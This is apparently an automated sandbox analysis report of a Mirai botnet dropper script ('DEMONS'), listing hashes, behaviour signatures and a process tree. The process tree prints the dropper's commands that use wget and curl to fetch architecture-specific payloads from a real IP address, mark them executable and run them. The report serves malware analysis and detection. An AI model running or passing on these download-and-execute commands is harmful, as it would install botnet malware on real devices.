Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    07/03/2025, 12:37

General

  • Target

    0x83911d24Fx.sh

  • Size

    2KB

  • MD5

    6aea9de4b1853e6a5cea8ad020f48398

  • SHA1

    20e44372765f05e6899aa9bd7e4d9ff64f59c2f7

  • SHA256

    e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f

  • SHA512

    4cb78d553f9ae66e591534a047163ba9db0e54261266c700be091b4ddfe773de2e194f3b80916d40830d1d26f6a76912191fd01858922599fa2b88ca0c70d5a2

Malware Config

Extracted

Family

mirai

Botnet

DEMONS

Extracted

Family

mirai

Botnet

DEMONS

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 13 IoCs
  • Modifies Watchdog functionality 1 TTPs 24 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 11 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Writes file to system bin folder 12 IoCs
  • Changes its process name 12 IoCs
  • Reads system network configuration 1 TTPs 11 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 13 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 27 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/0x83911d24Fx.sh
    /tmp/0x83911d24Fx.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:697
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.x86
      2⤵
      • Writes file to tmp directory
      PID:705
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:712
    • /bin/cat
      cat uYtea.x86
      2⤵
        PID:721
      • /bin/chmod
        chmod +x 0x83911d24Fx.sh systemd-private-f0d0d805b90f4ec4bb2092fe107c73cc-systemd-timedated.service-TeF4Xv uYtea.x86 x
        2⤵
        • File and Directory Permissions Modification
        PID:722
      • /tmp/x
        ./x SSH.Selfrep
        2⤵
          PID:723
        • /usr/bin/wget
          wget http://176.100.37.236/LjEZs/uYtea.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:726
        • /usr/bin/curl
          curl -O http://176.100.37.236/LjEZs/uYtea.mips
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:729
        • /bin/cat
          cat uYtea.mips
          2⤵
          • System Network Configuration Discovery
          PID:733
        • /bin/chmod
          chmod +x 0x83911d24Fx.sh systemd-private-f0d0d805b90f4ec4bb2092fe107c73cc-systemd-timedated.service-TeF4Xv uYtea.mips uYtea.x86 x
          2⤵
          • File and Directory Permissions Modification
          PID:734
        • /tmp/x
          ./x SSH.Selfrep
          2⤵
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Changes its process name
          PID:735
        • /usr/bin/wget
          wget http://176.100.37.236/LjEZs/uYtea.mpsl
          2⤵
          • Writes file to tmp directory
          PID:737
        • /usr/bin/curl
          curl -O http://176.100.37.236/LjEZs/uYtea.mpsl
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:740
        • /bin/chmod
          chmod +x 0x83911d24Fx.sh systemd-private-f0d0d805b90f4ec4bb2092fe107c73cc-systemd-timedated.service-TeF4Xv uYtea.mips uYtea.mpsl uYtea.x86 x
          2⤵
          • File and Directory Permissions Modification
          PID:742
        • /tmp/x
          ./x SSH.Selfrep
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:743
        • /usr/bin/wget
          wget http://176.100.37.236/LjEZs/uYtea.arm
          2⤵
          • Writes file to tmp directory
          PID:746
        • /usr/bin/curl
          curl -O http://176.100.37.236/LjEZs/uYtea.arm
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:747
        • /bin/chmod
          chmod +x 0x83911d24Fx.sh systemd-private-f0d0d805b90f4ec4bb2092fe107c73cc-systemd-timedated.service-TeF4Xv uYtea.arm uYtea.mips uYtea.mpsl uYtea.x86 x
          2⤵
          • File and Directory Permissions Modification
          PID:749
        • /tmp/x
          ./x SSH.Selfrep
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:750
        • /usr/bin/wget
          wget http://176.100.37.236/LjEZs/uYtea.arm5
          2⤵
          • Writes file to tmp directory
          PID:756
        • /usr/bin/curl
          curl -O http://176.100.37.236/LjEZs/uYtea.arm5
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:757
        • /bin/chmod
          chmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.mips uYtea.mpsl uYtea.x86 x
          2⤵
          • File and Directory Permissions Modification
          PID:759
        • /tmp/x
          ./x SSH.Selfrep
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:760
        • /usr/bin/wget
          wget http://176.100.37.236/LjEZs/uYtea.arm6
          2⤵
          • Writes file to tmp directory
          PID:783
        • /usr/bin/curl
          curl -O http://176.100.37.236/LjEZs/uYtea.arm6
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:786
        • /bin/chmod
          chmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.mips uYtea.mpsl uYtea.x86 x
          2⤵
          • File and Directory Permissions Modification
          PID:793
        • /tmp/x
          ./x SSH.Selfrep
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:794
        • /usr/bin/wget
          wget http://176.100.37.236/LjEZs/uYtea.arm7
          2⤵
          • Writes file to tmp directory
          PID:812
        • /usr/bin/curl
          curl -O http://176.100.37.236/LjEZs/uYtea.arm7
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:815
        • /bin/chmod
          chmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.x86 x
          2⤵
          • File and Directory Permissions Modification
          PID:818
        • /tmp/x
          ./x SSH.Selfrep
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:819
        • /usr/bin/wget
          wget http://176.100.37.236/LjEZs/uYtea.ppc
          2⤵
          • Writes file to tmp directory
          PID:833
        • /usr/bin/curl
          curl -O http://176.100.37.236/LjEZs/uYtea.ppc
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:837
        • /bin/chmod
          chmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x
          2⤵
          • File and Directory Permissions Modification
          PID:843
        • /tmp/x
          ./x SSH.Selfrep
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:844
        • /usr/bin/wget
          wget http://176.100.37.236/LjEZs/uYtea.m68k
          2⤵
          • Writes file to tmp directory
          PID:858
        • /usr/bin/curl
          curl -O http://176.100.37.236/LjEZs/uYtea.m68k
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:860
        • /bin/chmod
          chmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x
          2⤵
          • File and Directory Permissions Modification
          PID:862
        • /tmp/x
          ./x SSH.Selfrep
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:863
        • /usr/bin/wget
          wget http://176.100.37.236/LjEZs/uYtea.sh4
          2⤵
          • Writes file to tmp directory
          PID:865
        • /usr/bin/curl
          curl -O http://176.100.37.236/LjEZs/uYtea.sh4
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:867
        • /bin/chmod
          chmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.x86 x
          2⤵
          • File and Directory Permissions Modification
          PID:869
        • /tmp/x
          ./x SSH.Selfrep
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:870
        • /usr/bin/wget
          wget http://176.100.37.236/LjEZs/uYtea.spc
          2⤵
          • Writes file to tmp directory
          PID:873
        • /usr/bin/curl
          curl -O http://176.100.37.236/LjEZs/uYtea.spc
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:874
        • /bin/chmod
          chmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x
          2⤵
          • File and Directory Permissions Modification
          PID:876
        • /tmp/x
          ./x SSH.Selfrep
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:877
        • /usr/bin/wget
          wget http://176.100.37.236/LjEZs/uYtea.arc
          2⤵
          • Writes file to tmp directory
          PID:880
        • /usr/bin/curl
          curl -O http://176.100.37.236/LjEZs/uYtea.arc
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:881
        • /bin/chmod
          chmod +x 0x83911d24Fx.sh uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x
          2⤵
          • File and Directory Permissions Modification
          PID:883
        • /tmp/x
          ./x SSH.Selfrep
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:884
        • /usr/bin/wget
          wget http://176.100.37.236/LjEZs/uYtea.x86_64
          2⤵
          • Writes file to tmp directory
          PID:886
        • /usr/bin/curl
          curl -O http://176.100.37.236/LjEZs/uYtea.x86_64
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:888
        • /bin/chmod
          chmod +x 0x83911d24Fx.sh uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 uYtea.x86_64 x
          2⤵
          • File and Directory Permissions Modification
          PID:890
        • /tmp/x
          ./x SSH.Selfrep
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:891

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/uYtea.x86

        Filesize

        54KB

        MD5

        e8ee0839bb7869765d80e4280d585222

        SHA1

        e0aa7ad73b70d2fbd0f8f4ca2d5ca417c6e36538

        SHA256

        34537b3ae42d5d93060f42ccd019a8e976290a01b0380e6688a2dfa1515cd1a6

        SHA512

        a3570f2617a4ed149c1a8a8a396a2d0522c09551ab54ef7c7b882c71b66ac3cd9246e552b6acaceeb2585c337bee9e471af729dee5a08f9a491ab14a6c72f02b

      • /tmp/x

        Filesize

        75KB

        MD5

        e22278172a0f989dcd639152d1f7bdda

        SHA1

        5ef82abd4a65994779ed81263e4495aa2a1fc0a0

        SHA256

        c21056260e2db4b9f6dc025dfa6286ef2865b3b4f43a4633a7653499b63f20d3

        SHA512

        686e0967c54a58d086e279d2b3d3aedbc604221b802c2fbf2ec4d55acc681eefcbf1edd236828c257350d5f75694d0dd4a98d35c8e7fa247ebe1dc4bc211e74e